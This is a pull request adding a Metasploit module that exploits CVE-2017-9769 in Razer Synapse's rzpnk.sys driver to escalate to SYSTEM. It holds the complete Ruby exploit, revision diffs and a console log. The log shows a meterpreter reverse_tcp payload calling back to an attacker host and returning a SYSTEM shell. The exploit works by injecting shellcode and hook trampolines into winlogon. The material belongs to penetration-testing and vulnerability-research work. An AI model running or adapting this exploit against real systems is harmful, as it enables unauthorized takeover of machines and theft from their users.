### PR TITLE
Module for Razer Synapse (CVE-2017-9769)

### DIFF
--- a/modules/exploits/windows/local/razer_zwopenprocess.rb
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -92,10 +92,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if sysinfo['Architecture'] =~ /wow64/i
       fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
-    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
-      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
-    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
-      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    elsif sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported')
     end
 
     pid = session.sys.process['RazerIngameEngine.exe']

--- a/modules/exploits/windows/local/razer_zwopenprocess.rb
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -70,15 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    pid = session.sys.process['RazerIngameEngine.exe']
-    session.sys.process.kill(pid) unless pid.nil?
+    # Validate that the driver has been loaded and that
+    # the version is the same as the one expected
+    client.sys.config.getdrivers.each do |d|
+      if d[:basename].downcase == 'rzpnk.sys'
+        expected_checksum = 'b4598c05d5440250633e25933fff42b0'
+        target_checksum = client.fs.file.md5(d[:filename])
 
-    pid = session.sys.process['winlogon.exe']
-    handle = get_handle(pid)
-    return Exploit::CheckCode::Safe if handle.nil?
+        if expected_checksum == Rex::Text.to_hex(target_checksum, '')
+          return Exploit::CheckCode::Appears
+        else
+          return Exploit::CheckCode::Detected
+        end
+      end
+    end
 
-    session.railgun.kernel32.CloseHandle(handle)
-    Exploit::CheckCode::Vulnerable
+    Exploit::CheckCode::Safe
   end
 
   def exploit
@@ -90,14 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
     end
 
-    if sysinfo['Architecture'] =~ /wow64/i
-      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
-    elsif sysinfo['Architecture'] == ARCH_X86
-      fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported')
+    if session.platform != 'windows'
+      fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
+    elsif session.arch != ARCH_X64
+      fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
     end
 
     pid = session.sys.process['RazerIngameEngine.exe']
-    unless pid.nil?
+    if pid
       # if this process is running, the IOCTL won't work but the process runs
       # with user privileges so we can kill it
       print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")

--- a/modules/exploits/windows/local/razer_zwopenprocess.rb
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -13,26 +13,29 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::Windows::Priv
 
+  # the max size our hook can be, used before it's generated for the allocation
+  HOOK_STUB_MAX_LENGTH = 256
+
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Razer Synapse rzpnk.sys IOCTL',
+      'Name'           => 'Razer Synapse rzpnk.sys ZwOpenProcess',
       'Description'    => %q{
         A vulnerability exists in the latest version of Razer Synapse
-        (v2.20.17.302) which can be leveraged locally by a malicious application
-        to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The
-        vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver
-        that passes a PID specified by the user to ZwOpenProcess. This can be
-        issued by an application to open a handle to an arbitrary process with
-        the necessary privileges to allocate, read and write memory in the
-        specified process.
+        (v2.20.15.1104 as of the day of disclosure) which can be leveraged
+        locally by a malicious application to elevate its privileges to those of
+        NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
+        in the rzpnk.sys driver that passes a PID specified by the user to
+        ZwOpenProcess. This can be issued by an application to open a handle to
+        an arbitrary process with the necessary privileges to allocate, read and
+        write memory in the specified process.
 
         This exploit leverages this vulnerability to open a handle to the
         winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
-        installing hooks to execute attacker controlled shellcode. These hooks
-        are then triggered on demand by calling user32!LockWorkStation(),
-        resulting in the attacker's payload being executed with the privileges
-        of the infected winlogon process. In order for the issued IOCTL to work,
-        the RazerIngameEngine.exe process must not be running. This exploit will
+        installing a hook to execute attacker controlled shellcode. This hook is
+        then triggered on demand by calling user32!LockWorkStation(), resulting
+        in the attacker's payload being executed with the privileges of the
+        infected winlogon process. In order for the issued IOCTL to work, the
+        RazerIngameEngine.exe process must not be running. This exploit will
         check if it is, and attempt to kill it as necessary.
 
         The vulnerable software can be found here:
@@ -45,20 +48,21 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         => 'Spencer McIntyre',
       'License'        => MSF_LICENSE,
       'References'     => [
-        ['CVE', 'CVE-2017-9769'],
-        #['URL', ''],
+        ['CVE', '2017-9769'],
+        ['URL', 'https://warroom.securestate.com/cve-2017-9769/']
       ],
       'Platform'       => 'win',
       'Targets'        =>
         [
           # Tested on (64 bits):
           # * Windows 7 SP1
-          # * Windows 10.0.14385
+          # * Windows 10.0.10586
           [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC'   => 'thread'
+          'EXITFUNC'   => 'thread',
+          'WfsDelay'   => 20
         },
       'DefaultTarget'  => 0,
       'Privileged'     => true,
@@ -103,42 +107,47 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     pid = session.sys.process['winlogon.exe']
-    print_status("Found winlogon.exe pid: #{pid}")
+    print_status("Found winlogon pid: #{pid}")
 
     handle = get_handle(pid)
     fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
+    vprint_status('Successfully opened a handle to the winlogon process')
 
     winlogon = session.sys.process.new(pid, handle)
-    shellcode_address = winlogon.memory.allocate(4096)
+    allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
+    shellcode_address = winlogon.memory.allocate(allocation_size)
     winlogon.memory.protect(shellcode_address)
-    print_good("Allocated 4096 bytes in winlogon.exe at 0x#{shellcode_address.to_s(16)}")
+    print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
     winlogon.memory.write(shellcode_address, payload.encoded)
     hook_stub_address = shellcode_address + payload.encoded.length
 
-    result = session.railgun.kernel32.LoadLibraryA('winsta')
-    fail_with(Failure::Unknown, 'Failed to get a handle to winsta.dll') if result['return'] == 0
-    winsta_handle = result['return']
+    result = session.railgun.kernel32.LoadLibraryA('user32')
+    fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
+    user32_handle = result['return']
 
     # resolve and backup the functions that we'll install trampolines in
-    winsta_trampolines = {}  # address => original chunk
-    winsta_functions = ['_WinStationWaitForConnect', 'WinStationIsSessionRemoteable']
-    winsta_functions.each do |function|
-      address = get_address(winsta_handle, function)
+    user32_trampolines = {}  # address => original chunk
+    user32_functions = ['LockWindowStation']
+    user32_functions.each do |function|
+      address = get_address(user32_handle, function)
       winlogon.memory.protect(address)
-      winsta_trampolines[function] = {
+      user32_trampolines[function] = {
         address:  address,
         original: winlogon.memory.read(address, 24)
       }
     end
 
     # generate and install the hook asm
-    hook_stub = get_hook(shellcode_address, winsta_trampolines)
+    hook_stub = get_hook(shellcode_address, user32_trampolines)
     fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
+    # if this happens, there was a programming error
+    fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
+
     winlogon.memory.write(hook_stub_address, hook_stub)
-    vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon.exe at 0x#{hook_stub_address}")
+    vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
 
     # install the asm trampolines to jump to the hook
-    winsta_trampolines.each do |function, trampoline_info|
+    user32_trampolines.each do |function, trampoline_info|
       address = trampoline_info[:address]
       trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
         mov  rax, 0x#{address.to_s(16)}
@@ -147,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
         jmp  rax
       }).encode_string
       winlogon.memory.write(address, trampoline)
-      vprint_status("Installed winsta!#{address} trampoline at 0x#{address.to_s(16)}")
+      vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}")
     end
 
     session.railgun.user32.LockWorkStation()
@@ -241,7 +250,6 @@ class MetasploitModule < Msf::Exploit::Remote
       pop  r9
       ret
     }
-    print_line(stub)
     Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
   end
 end

--- a/modules/exploits/windows/local/razer_zwopenprocess.rb
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -1,0 +1,247 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/local/windows_kernel'
+require 'rex'
+require 'metasm'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Local::WindowsKernel
+  include Msf::Post::Windows::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Razer Synapse rzpnk.sys IOCTL',
+      'Description'    => %q{
+        A vulnerability exists in the latest version of Razer Synapse
+        (v2.20.17.302) which can be leveraged locally by a malicious application
+        to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The
+        vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver
+        that passes a PID specified by the user to ZwOpenProcess. This can be
+        issued by an application to open a handle to an arbitrary process with
+        the necessary privileges to allocate, read and write memory in the
+        specified process.
+
+        This exploit leverages this vulnerability to open a handle to the
+        winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
+        installing hooks to execute attacker controlled shellcode. These hooks
+        are then triggered on demand by calling user32!LockWorkStation(),
+        resulting in the attacker's payload being executed with the privileges
+        of the infected winlogon process. In order for the issued IOCTL to work,
+        the RazerIngameEngine.exe process must not be running. This exploit will
+        check if it is, and attempt to kill it as necessary.
+
+        The vulnerable software can be found here:
+        https://www.razerzone.com/synapse/. No Razer hardware needs to be
+        connected in order to leverage this vulnerability.
+
+        This exploit is not opsec-safe due to the user being logged out as part
+        of the exploitation process.
+      },
+      'Author'         => 'Spencer McIntyre',
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['CVE', 'CVE-2017-9769'],
+        #['URL', ''],
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # Tested on (64 bits):
+          # * Windows 7 SP1
+          # * Windows 10.0.14385
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC'   => 'thread'
+        },
+      'DefaultTarget'  => 0,
+      'Privileged'     => true,
+      'DisclosureDate' => 'Mar 22 2017'))
+  end
+
+  def check
+    pid = session.sys.process['RazerIngameEngine.exe']
+    session.sys.process.kill(pid) unless pid.nil?
+
+    pid = session.sys.process['winlogon.exe']
+    handle = get_handle(pid)
+    return Exploit::CheckCode::Safe if handle.nil?
+
+    session.railgun.kernel32.CloseHandle(handle)
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+    end
+
+    if sysinfo['Architecture'] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    end
+
+    pid = session.sys.process['RazerIngameEngine.exe']
+    unless pid.nil?
+      # if this process is running, the IOCTL won't work but the process runs
+      # with user privileges so we can kill it
+      print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")
+      session.sys.process.kill(pid)
+    end
+
+    pid = session.sys.process['winlogon.exe']
+    print_status("Found winlogon.exe pid: #{pid}")
+
+    handle = get_handle(pid)
+    fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
+
+    winlogon = session.sys.process.new(pid, handle)
+    shellcode_address = winlogon.memory.allocate(4096)
+    winlogon.memory.protect(shellcode_address)
+    print_good("Allocated 4096 bytes in winlogon.exe at 0x#{shellcode_address.to_s(16)}")
+    winlogon.memory.write(shellcode_address, payload.encoded)
+    hook_stub_address = shellcode_address + payload.encoded.length
+
+    result = session.railgun.kernel32.LoadLibraryA('winsta')
+    fail_with(Failure::Unknown, 'Failed to get a handle to winsta.dll') if result['return'] == 0
+    winsta_handle = result['return']
+
+    # resolve and backup the functions that we'll install trampolines in
+    winsta_trampolines = {}  # address => original chunk
+    winsta_functions = ['_WinStationWaitForConnect', 'WinStationIsSessionRemoteable']
+    winsta_functions.each do |function|
+      address = get_address(winsta_handle, function)
+      winlogon.memory.protect(address)
+      winsta_trampolines[function] = {
+        address:  address,
+        original: winlogon.memory.read(address, 24)
+      }
+    end
+
+    # generate and install the hook asm
+    hook_stub = get_hook(shellcode_address, winsta_trampolines)
+    fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
+    winlogon.memory.write(hook_stub_address, hook_stub)
+    vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon.exe at 0x#{hook_stub_address}")
+
+    # install the asm trampolines to jump to the hook
+    winsta_trampolines.each do |function, trampoline_info|
+      address = trampoline_info[:address]
+      trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
+        mov  rax, 0x#{address.to_s(16)}
+        push rax
+        mov  rax, 0x#{hook_stub_address.to_s(16)}
+        jmp  rax
+      }).encode_string
+      winlogon.memory.write(address, trampoline)
+      vprint_status("Installed winsta!#{address} trampoline at 0x#{address.to_s(16)}")
+    end
+
+    session.railgun.user32.LockWorkStation()
+    session.railgun.kernel32.CloseHandle(handle)
+  end
+
+  def get_address(dll_handle, function_name)
+    result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)
+    fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0
+    result['return']
+  end
+
+  # this is where the actual vulnerability is leveraged
+  def get_handle(pid)
+    handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    return nil unless handle
+    vprint_status('Successfully opened a handle to the driver')
+
+    buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')
+
+    session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[
+      ['DWORD',  'FileHandle',         'in' ],
+      ['DWORD',  'Event',              'in' ],
+      ['LPVOID', 'ApcRoutine',         'in' ],
+      ['LPVOID', 'ApcContext',         'in' ],
+      ['PDWORD', 'IoStatusBlock',      'out'],
+      ['DWORD',  'IoControlCode',      'in' ],
+      ['PBLOB',  'InputBuffer',        'in' ],
+      ['DWORD',  'InputBufferLength',  'in' ],
+      ['PBLOB',  'OutputBuffer',       'out'],
+      ['DWORD',  'OutputBufferLength', 'in' ],
+    ])
+    result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)
+    return nil if result['return'] != 0
+    session.railgun.kernel32.CloseHandle(handle)
+
+    result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]
+  end
+
+  def get_hook(shellcode_address, restore)
+    dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']
+    return nil if dll_handle == 0
+    create_thread_address = get_address(dll_handle, 'CreateThread')
+
+    stub = %{
+      call main
+      ; restore the functions where the trampolines were installed
+      push rbx
+    }
+
+    restore.each do |function, trampoline_info|
+      original = trampoline_info[:original].unpack('Q*')
+      stub << "mov  rax, 0x#{trampoline_info[:address].to_s(16)}"
+      original.each do |chunk|
+        stub << %{
+          mov  rbx, 0x#{chunk.to_s(16)}
+          mov  qword ptr ds:[rax], rbx
+          add  rax, 8
+        }
+      end
+    end
+
+    stub << %{
+      pop  rbx
+      ret
+
+      main:
+      ; backup registers we're going to mangle
+      push r9
+      push r8
+      push rdx
+      push rcx
+
+      ; setup the arguments for the call to CreateThread
+      xor  rax, rax
+      push rax                                      ; lpThreadId
+      push rax                                      ; dwCreationFlags
+      xor  r9, r9                                   ; lpParameter
+      mov  r8, 0x#{shellcode_address.to_s(16)}      ; lpStartAddress
+      xor  rdx, rdx                                 ; dwStackSize
+      xor  rcx, rcx                                 ; lpThreadAttributes
+      mov  rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread
+
+      call rax
+      add  rsp, 16
+
+      ; restore arguments that were mangled
+      pop  rcx
+      pop  rdx
+      pop  r8
+      pop  r9
+      ret
+    }
+    print_line(stub)
+    Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
+  end
+end


### PR DESCRIPTION
This PR adds a local privilege escalation module that exploits a currently unpatched vulnerability in Razer's Synapse application. The vulnerability exists within the rzpnk.sys driver where a specially crafted IOCTL can be used to open a handle to an arbitrary process with the necessary privileges to read, write, and allocate memory.

This vulnerability is identified by CVE-2017-9769.

The exploit module leverages the vulnerability to open a handle to the winlogon process which runs as NT_AUTHORITY\SYSTEM. The handle is then used to install a hook to execute the payload in a new thread. The hook can then be triggered on demand by the attacker with a call to `user32!LockWorkStation`.

Verification steps:
 - [ ] Download and install the latest version of [Razer Synapse](https://www.razerzone.com/synapse) (no hardware needs to be connected for exploitation)
 - [ ] Start msfconsole and get a meterpreter session as a user
 - [ ] `use exploit/windows/local/razer_zwopenprocess`
 - [ ] `set SESSION -1`
 - [ ] Set an appropriate x64 payload
 - [ ] Run the exploit and receive a session as SYSTEM
 - [ ] Note that the workstation is locked but winlogon is stable

Example usage on Windows 10 x64:
```
metasploit-framework (S:0 J:1) payload(reverse_tcp) > 
[*] [2017.07.11-11:17:42] Sending stage (1188415 bytes) to 172.20.220.196
[*] Meterpreter session 1 opened (172.20.220.101:4444 -> 172.20.220.196:49681) at 2017-07-11 11:17:44 -0400

metasploit-framework (S:1 J:0) payload(reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-LDICAD0
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background 
[*] Backgrounding session 1...
metasploit-framework (S:1 J:0) payload(reverse_tcp) > use exploit/windows/local/razer_zwopenprocess 
metasploit-framework (S:1 J:0) exploit(razer_zwopenprocess) > set SESSION 1
SESSION => 1
metasploit-framework (S:1 J:0) exploit(razer_zwopenprocess) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
metasploit-framework (S:1 J:0) exploit(razer_zwopenprocess) > set LHOST 172.20.220.101
LHOST => 172.20.220.101
metasploit-framework (S:1 J:0) exploit(razer_zwopenprocess) > exploit

[*] [2017.07.11-11:18:25] Started reverse TCP handler on 172.20.220.101:4444 
[*] [2017.07.11-11:18:26] Successfully opened a handle to the driver
[*] [2017.07.11-11:18:27] Found winlogon.exe pid: 492
[*] [2017.07.11-11:18:27] Successfully opened a handle to the driver
[+] [2017.07.11-11:18:27] Allocated 705 bytes in winlogon.exe at 0x1f30f370000
[*] [2017.07.11-11:18:28] Wrote the 125 byte hook stub in winlogon.exe at 0x2143443943873
[*] [2017.07.11-11:18:28] Installed user32!LockWindowStation trampoline at 0x7ffcef499d20
[*] [2017.07.11-11:18:30] Sending stage (1188415 bytes) to 172.20.220.196
[*] Meterpreter session 2 opened (172.20.220.101:4444 -> 172.20.220.196:49689) at 2017-07-11 11:18:31 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```